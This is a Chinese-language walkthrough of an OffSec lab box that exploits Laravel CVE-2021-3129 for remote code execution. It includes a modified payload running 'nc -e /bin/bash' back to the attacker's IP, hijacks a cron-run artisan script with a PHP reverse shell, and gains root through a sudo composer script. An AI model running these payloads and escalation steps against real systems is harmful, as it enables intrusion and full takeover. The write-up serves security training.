主要知识点
- 有时需要创建多个反弹shell
- cronjo 脚本劫持
- sudo compose提权
具体步骤
依旧nmap开始,只有22端口和80端口,比较直接,但不一定简单
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-06 07:20 UTC
Nmap scan report for 192.168.59.38
Host is up (0.00079s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u2 (protocol 2.0)
| ssh-hostkey:
| 3072 c9:c3:da:15:28:3b:f1:f8:9a:36:df:4d:36:6b:a7:44 (RSA)
| 256 26:03:2b:f6:da:90:1d:1b:ec:8d:8f:8d:1e:7e:3d:6b (ECDSA)
|_ 256 fb:43:b2:b0:19:2f:d3:f6:bc:aa:60:67:ab:c1:af:37 (ED25519)
80/tcp open http Apache httpd 2.4.56 ((Debian))
|_http-title: W3.CSS Template
|_http-server-header: Apache/2.4.56 (Debian)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
访问80端口,没发现什么,但是点击dropdown后会被要求登录,于是创建一个用户并登录
得到如下
随便上传一个图片,好像也没什么
点击ImageList中的任意文件后预览
尝试一下有没有本地文件包含漏洞,却意外发现404页面显示Laravel 8.4.0版本在运行
于是尝试搜索漏洞,得到GitHub - zhzyker/CVE-2021-3129: Laravel <= v8.4.2 debug mode: Remote code execution (CVE-2021-3129)
运行后发现该脚本比较全面,会尝试不同的RCE漏洞的exploit,有成功的,有失败的
C:\home\kali\Documents\OFFSEC\GoToWork\Lavita\CVE-2021-3129-main> python exp.py http://192.168.175.38
[*] Try to use Laravel/RCE1 for exploitation.
PHP Deprecated: Creation of dynamic property PHPGGC::$options is deprecated in /home/kali/Documents/OFFSEC/GoToWork/Lavita/CVE-2021-3129-main/lib/PHPGGC.php on line 779
PHP Deprecated: Creation of dynamic property PHPGGC::$parameters is deprecated in /home/kali/Documents/OFFSEC/GoToWork/Lavita/CVE-2021-3129-main/lib/PHPGGC.php on line 780
PHP Deprecated: Creation of dynamic property PHPGGC\Enhancement\Enhancements::$enhancements is deprecated in /home/kali/Documents/OFFSEC/GoToWork/Lavita/CVE-2021-3129-main/lib/PHPGGC/Enhancement/Enhancements.php on line 9
PHP Deprecated: Creation of dynamic property PHPGGC::$enhancements is deprecated in /home/kali/Documents/OFFSEC/GoToWork/Lavita/CVE-2021-3129-main/lib/PHPGGC.php on line 142
PHP Deprecated: Creation of dynamic property PHPGGC\Phar\Phar::$metadata is deprecated in /home/kali/Documents/OFFSEC/GoToWork/Lavita/CVE-2021-3129-main/lib/PHPGGC/Phar/Format.php on line 27
PHP Deprecated: Creation of dynamic property PHPGGC\Phar\Phar::$dummy_metadata is deprecated in /home/kali/Documents/OFFSEC/GoToWork/Lavita/CVE-2021-3129-main/lib/PHPGGC/Phar/Format.php on line 78
[+]exploit:
[*] Laravel/RCE1 Result:[*] Try to use Laravel/RCE2 for exploitation.
PHP Deprecated: Creation of dynamic property PHPGGC::$options is deprecated in /home/kali/Documents/OFFSEC/GoToWork/Lavita/CVE-2021-3129-main/lib/PHPGGC.php on line 779
PHP Deprecated: Creation of dynamic property PHPGGC::$parameters is deprecated in /home/kali/Documents/OFFSEC/GoToWork/Lavita/CVE-2021-3129-main/lib/PHPGGC.php on line 780
PHP Deprecated: Creation of dynamic property PHPGGC\Enhancement\Enhancements::$enhancements is deprecated in /home/kali/Documents/OFFSEC/GoToWork/Lavita/CVE-2021-3129-main/lib/PHPGGC/Enhancement/Enhancements.php on line 9
PHP Deprecated: Creation of dynamic property PHPGGC::$enhancements is deprecated in /home/kali/Documents/OFFSEC/GoToWork/Lavita/CVE-2021-3129-main/lib/PHPGGC.php on line 142
PHP Deprecated: Creation of dynamic property PHPGGC\Phar\Phar::$metadata is deprecated in /home/kali/Documents/OFFSEC/GoToWork/Lavita/CVE-2021-3129-main/lib/PHPGGC/Phar/Format.php on line 27
PHP Deprecated: Creation of dynamic property PHPGGC\Phar\Phar::$dummy_metadata is deprecated in /home/kali/Documents/OFFSEC/GoToWork/Lavita/CVE-2021-3129-main/lib/PHPGGC/Phar/Format.php on line 78
[+]exploit:
[*] Laravel/RCE2 Result:uid=33(www-data) gid=33(www-data) groups=33(www-data)[*] Try to use Laravel/RCE3 for exploitation.
PHP Deprecated: Creation of dynamic property PHPGGC::$options is deprecated in /home/kali/Documents/OFFSEC/GoToWork/Lavita/CVE-2021-3129-main/lib/PHPGGC.php on line 779
PHP Deprecated: Creation of dynamic property PHPGGC::$parameters is deprecated in /home/kali/Documents/OFFSEC/GoToWork/Lavita/CVE-2021-3129-main/lib/PHPGGC.php on line 780
PHP Deprecated: Creation of dynamic property PHPGGC\Enhancement\Enhancements::$enhancements is deprecated in /home/kali/Documents/OFFSEC/GoToWork/Lavita/CVE-2021-3129-main/lib/PHPGGC/Enhancement/Enhancements.php on line 9
PHP Deprecated: Creation of dynamic property PHPGGC::$enhancements is deprecated in /home/kali/Documents/OFFSEC/GoToWork/Lavita/CVE-2021-3129-main/lib/PHPGGC.php on line 142
PHP Deprecated: Creation of dynamic property PHPGGC\Phar\Phar::$metadata is deprecated in /home/kali/Documents/OFFSEC/GoToWork/Lavita/CVE-2021-3129-main/lib/PHPGGC/Phar/Format.php on line 27
PHP Deprecated: Creation of dynamic property PHPGGC\Phar\Phar::$dummy_metadata is deprecated in /home/kali/Documents/OFFSEC/GoToWork/Lavita/CVE-2021-3129-main/lib/PHPGGC/Phar/Format.php on line 78
[+]exploit:
[*] Laravel/RCE3 Result:......
......在review一下代码后,决定利用Laravel/RCE5来创建reverse shell,将exp.py中的RCE5改为如下
......
......"Laravel/RCE5":r"""php -d "phar.readonly=0" ./phpggc Laravel/RCE5 "system('nc -e /bin/bash 192.168.45.224 80');" --phar phar -o php://output | base64 -w 0 | python -c "import sys;print(''.join(['=' + hex (ord(i))[2:] + '=00' for i in sys.stdin.read()]).upper())"
......
......在本地启动nc -nlvp后,执行exp.py,得到reverse shell,也能拿到第一个flag
C:\home\kali\Documents\OFFSEC\GoToWork\Lavita\CVE-2021-3129-main> nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.224] from (UNKNOWN) [192.168.175.38] 52528
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whereis python
python: /usr/bin/python3.9 /usr/lib/python2.7 /usr/lib/python3.9 /etc/python3.9 /usr/local/lib/python3.9
/usr/bin/python3.9 -c 'import pty;pty.spawn("/bin/bash")'
www-data@debian:/$ cat /home/skunk/local.txt
cat /home/skunk/local.txt
30bcf5f4e648c694496fabd9e13acd7f
上传linpeas和pspy64后分别执行,
在linpeas.sh的结果中虽然有数据库的信息,但是没有太大的帮助,但是得知www-data和skunk用户比较有意思,留意一下
......
......
uid=1001(skunk) gid=1001(skunk) groups=1001(skunk),27(sudo),33(www-data)
......
......
uid=33(www-data) gid=33(www-data) groups=33(www-data)
......
......在pspy64的结果中发现了如下,看起来skunk用户会定期清理/var/www/html/lavita路径下的图片
2024/11/06 03:20:01 CMD: UID=1001 PID=16578 | /usr/bin/php /var/www/html/lavita/artisan clear:pictures 于是我们可以考虑劫持artisan来得到skunk用户的权限,反正目前也没法直接拿到root用户权限
,修改php-reverse-shell.php的ip和端口并上传到remote端,重命名并覆盖/var/www/html/lavita/artisan,本地执行nc -nlvp 3306,等一会儿得到了第二个reverse shell
C:\home\kali\Documents\OFFSEC\GoToWork\Lavita\CVE-2021-3129-main> nc -nlvp 3306
listening on [any] 3306 ...
connect to [192.168.45.224] from (UNKNOWN) [192.168.175.38] 47702
Linux debian 5.10.0-25-amd64 #1 SMP Debian 5.10.191-1 (2023-08-16) x86_64 GNU/Linux03:59:02 up 1:26, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1001(skunk) gid=1001(skunk) groups=1001(skunk),27(sudo),33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
skunk
$ id
uid=1001(skunk) gid=1001(skunk) groups=1001(skunk),27(sudo),33(www-data)
$ /usr/bin/python3.9 -c 'import pty;pty.spawn("/bin/bash")'
skunk@debian:/$
sudo -l 一下,可以无需密码执行/usr/bin/composer --working-dir\=/var/www/html/lavita *,看起来还能追加一些参数
skunk@debian:/$ sudo -l
sudo -l
Matching Defaults entries for skunk on debian:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser skunk may run the following commands on debian:(ALL : ALL) ALL(root) NOPASSWD: /usr/bin/composer --working-dir\=/var/www/html/lavita *
参考GTFOBins上的方法
修改一下变成如下,如果第一个命令用skunk的反弹shell无法执行,可以考虑用www-data用户的反弹shell执行,并用skunk的反弹shell执行第二个命令
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' > /var/www/html/lavita/composer.json
sudo /usr/bin/composer --working-dir\=/var/www/html/lavita run-script x提权成功
<er --working-dir\=/var/www/html/lavita run-script x
Do not run Composer as root/super user! See https://getcomposer.org/root for details
Continue as root/super user [yes]? yes
yes
> /bin/sh -i 0<&3 1>&3 2>&3
# whoami
whoami
root
# cat /root/proof.txt
cat /root/proof.txt
658e350be2cb99b3128f15ac634d1b3e
